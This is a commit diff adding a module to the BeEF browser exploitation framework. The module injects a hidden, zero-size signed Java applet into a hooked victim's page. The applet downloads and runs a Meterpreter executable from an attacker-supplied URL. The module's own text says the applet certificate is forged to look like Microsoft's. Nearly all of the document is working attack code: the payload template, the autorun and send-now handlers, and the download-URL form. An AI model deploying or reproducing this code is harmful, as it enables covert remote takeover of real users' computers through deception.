Initial Import

git-svn-id: https://beef.googlecode.com/svn/trunk@2 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9

modules/browser/msf_malicious_java_applet/index.php

@@ -0,0 +1,54 @@
+<?
+    // Copyright (c) 2006-2009, Wade Alcorn 
+    // All Rights Reserved
+    // wade@bindshell.net - http://www.bindshell.net
+    //
+    // Module by:   Joshua "Jabra" Abraham 
+    // jabra@spl0it.org
+    // http://blog.spl0it.org
+    // 
+	require_once("../../../include/common.inc.php"); // included for get_b64_file()
+	DEFINE('JS_FILE', './template.js');
+?>
+
+<script>
+	function get_b64_code_msf_applet() {
+		// javascript is loaded from a file - it could be hard coded
+		var b64code = '<? echo get_b64_file(JS_FILE); ?>';
+
+		// do some super escaping 		
+		msfcmd_str = document.myform.msfcmd.value;
+        
+        // replace sections of the code with user input
+        b64code = b64replace(b64code, "BAR",msfcmd_str);
+        b64code = b64replace(b64code, "FOO",msfcmd_str);
+
+		return b64code;
+	}
+
+	Element.Methods.set_autorun = function() {
+		ar.enable('Mozilla nsIProcess Interface', get_b64_code_msf_applet());
+	}
+	
+	Element.Methods.send_now = function() {
+		do_send(get_b64_code_msf_applet());
+	}
+
+	// add construct code to DOM
+	Element.addMethods();
+</script>
+
+<!-- PAGE CONTENT -->
+<div id="module_header">Metasploit Payload Java Applet</div>
+This module will execute a command on the client. The client will receive a Java Applet popup. <br><br>
+The certificate is self-signed by the Microsoft Corporation.<br><br>
+
+<div id="module_subsection">
+	<form name="myform">
+                <div id="module_subsection_header">URL to Download Meterpreter Payload</div>
+                <input type="text" name="msfcmd" value="http://<?=$_SERVER['SERVER_NAME']?>/beef/beef.exe"/>
+		<input class="button" type="button" value=" Set Autorun " onClick="javascript:set_autorun()"/>
+		<input class="button" type="button" value=" Send Now " onClick="javascript:send_now()"/>
+	</form>
+</div>
+

modules/browser/msf_malicious_java_applet/name.txt

@@ -0,0 +1 @@
+MSF Payload Java Applet

modules/browser/msf_malicious_java_applet/template.js

@@ -0,0 +1,23 @@
+
+// ie doesn't play nice with dynamic loading of jars - below is a link to what sun recommends
+// if any knows a nicer way to do this drop me an email
+// http://java.sun.com/javase/6/docs/technotes/guides/plugin/developer_guide/using_tags.html#javascript
+
+function applet() {	
+	
+	var _app = navigator.appName;
+
+    var malicious = document.createElement("div");
+	if (_app == 'Microsoft Internet Explorer') {
+        	malicious.innerHTML = '<OBJECT classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" width="0" height="0">> <PARAM name="codebase" value="../modules/browser/malicious_msf_applet"> <PARAM name="code" value="Update.class"> <PARAM name="archive" value="SignedUpdate.jar"> <PARAM name="msfcmd" value="BAR"> </OBJECT>>';
+	} else {
+        malicious.innerHTML = '<OBJECT width="0" height="0" codebase="../modules/browser/malicious_msf_applet/" archive="SignedUpdate.jar" code="Update" type="application/x-java-applet;version=1.6"> <PARAM name="msfcmd" value="FOO"> </OBJECT>';        
+	}
+
+    document.body.appendChild(malicious);
+
+	return_result(result_id, "Appet running");
+}
+
+applet();
+